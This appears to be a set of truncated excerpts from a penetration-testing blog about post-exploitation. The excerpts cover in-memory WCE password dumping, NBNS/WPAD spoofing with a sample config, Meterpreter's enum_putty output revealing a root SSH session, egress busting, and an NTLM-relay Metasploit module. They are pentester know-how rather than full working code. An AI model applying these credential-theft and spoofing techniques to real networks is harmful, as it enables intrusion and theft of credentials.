Executing WCE.exe in memory as demoed by Egypt here: https://community.rapid7.com/community/metasploit/blog/2012/05/08/eternal-sunshine-of-the-spotless-ram has two issues with it. 1, you leave a file on disk with your hashes and clear text passwords. That just won’t do. 2. There is this DLL called WCEAUX.dll that gets written for the briefest second to disk: (yes I realize I’m running this on disk ‘wce32.exe’, but it exhibits the same DLL drop when doing in-memory) Now, don’t get me wrong, I love WCE, and Hernan Ochoa does an amazing job with it, but when it comes down to it, it’s the best tool for the job.
So it turns out that Windows Firewall talks IP addresses just like any other firewall, so if you configure FakeNetBIOSNS to tell everyone that the IP address for whatever they looked up is YOUR IP, guess what, no need to bypass the spoof filters ;-) Happy Rob! $ cat nbns.ini PROJECTMENTOR WPAD 172.16.10.207 PROJECTMENTOR FILESHARE 184.108.40.206 Results in: Game ON!
One of pen testers favorite attacks is NBNS spoofing. Now Wesley who I originally learned this attack from, traced this back to sid (http://www.notsosecure.com/folder2/2007/03/14/abusing-tcpip-name-resolution-in-windows-to-carry-out-phishing-attacks/) . Wesley’s stuff can be found here: http://www.mcgrewsecurity.com/tools/nbnspoof/ Wesley’s stuff eventually lead to this awesome post on the Packetstan blog: http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html and in that post the Metasploit module to do it all is demoed. But there in lies the rub. With each degree of separation we have more and more solidified in into a “on-site” only attack.
Watching Egypt’s talk at DEFCON 20 he mentioned the ability to jump on on a system when pageant (puTTY’s ssh-agent equivalent) is running. So I wanted to figure out the best way to get this going. Here is what I came up with: meterpreter > run enum_putty [*] Putty Installed for [["Administrator"]] [*] Saved SSH Server Public Keys: [*] rsa2@22:172.16.10.150 [*] Session corp_webserver: [*] Protocol: SSH [*] Hostname: 172.16.10.150 [*] Username: root [*] Public Key: meterpreter > Awesome, this guy runs as root and we have the IP address.
The post exploitation command lists: Linux/Unix/BSD Post Exploitation: https://docs.google.com/document/d/1ObQB6hmVvRPCgPTRZM5NMH034VDM-1N-EWPRz2770K4/edit Windows Post Exploitation: https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit OSX Post Exploitation: https://docs.google.com/document/d/10AUm_zUdAQGgoHNo_eS0SO1K-24VVYnulUD2x3rJD3k/edit and the newly added Obsucure Syststem’s Post Exploitation: https://docs.google.com/document/d/1CIs6O1kMR-bXAT80U6Jficsqm0yR5dKUfUQgwiIKzgc/edit and Metasploit Post Exploitation: https://docs.google.com/document/d/1ZrDJMQkrp_YbU_9Ni9wMNF2m3nIPEA_kekqqqA2Ywto/edit Have been a weekly upkeep for me with so many… I don’t know what to call it, ‘undesirable edits’ to them. Bad copies, bad pastes, formatting issues and some times deletion or vandalism of the docs. Anyways, I have finally broken down and removed ‘world’ editable permissions.
In the previous post: http://www.room362.com/blog/2012/8/11/let-me-out-of-your-net-workndashintro.html I told you about letmeoutofyour.net, but how does it work? Things we need to accomplish on the server: Listen on all ports Answer for all hostnames and subdomains Answer for all HTTP verbs, file and folder requests ONE: Listen on all ports (I used Linux, so this guide is for such, modifications to other OSs is up to the reader) First you have to get rid of all other services.
Something that is often useful is a known-good. Something out of the control of your adversary or outside modifiers. But back to that in a sec, egress ‘busting’ or getting your payload/backdoor/trojan/c2 out of someone’s network once you’ve gotten that ever elusive “CODE EXECUTION HAPPY DANCE” going on isn’t always easy. There is even a Metasploit payload for it called ‘allports’: https://community.rapid7.com/community/metasploit/blog/2009/09/24/forcing-payloads-through-restrictive-firewalls There is also ‘Egress Buster’ by the guys over at TrustedSec which can do 1000 ports in just a few seconds:
Egypt and I have decided to give away a spot in our training event at DerbyCon. This won’t come easy though, you have to submit an essay to us with one of the following topics: Essay Topic Options: 1. Why I deserve a free training class 2. How I would social engineer Egypt and Mubix out of a ticket to their class Maximum Length: ~1000 words / 3 pages. (We’re lazy)
With the use of Mimikatz and WCE, clear text passwords are much more common. What isn’t always there is the user. They take lunches, go home at a reasonable time and generally aren’t really appreciative of our (pentester/red teamer)’s schedule. A straight forward way, and provided by Microsoft to create a process as a user (whereby having their token readily available is using ‘runas.exe’: w00t, we the user is present, we can migrate our meterepreter session into that notepad and we’re good right?
Every so often someone writes a Metasploit Module that is pretty epic. Today is one such day: Twitter Link: https://twitter.com/webstersprodigy/status/222529916783169536 Which has a link to here: https://github.com/rapid7/metasploit-framework/pull/589 Demo / Example resource files: https://skydrive.live.com/?cid=19794fac33285fd5&resid=19794FAC33285FD5!170&id=19794FAC33285FD5%21170 You can pull the fork w/ branch from here: https://github.com/webstersprodigy/metasploit-framework/tree/module-http-ntlmrelay And as soon as you do you can start doing this (using the example resource file to put a file, cat it out, enum shares available, list files on a share, then psexec all from a single URL being loaded):